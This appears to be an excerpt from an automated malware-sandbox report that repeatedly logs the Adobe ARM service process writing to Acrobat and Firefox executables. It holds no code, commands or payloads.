              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
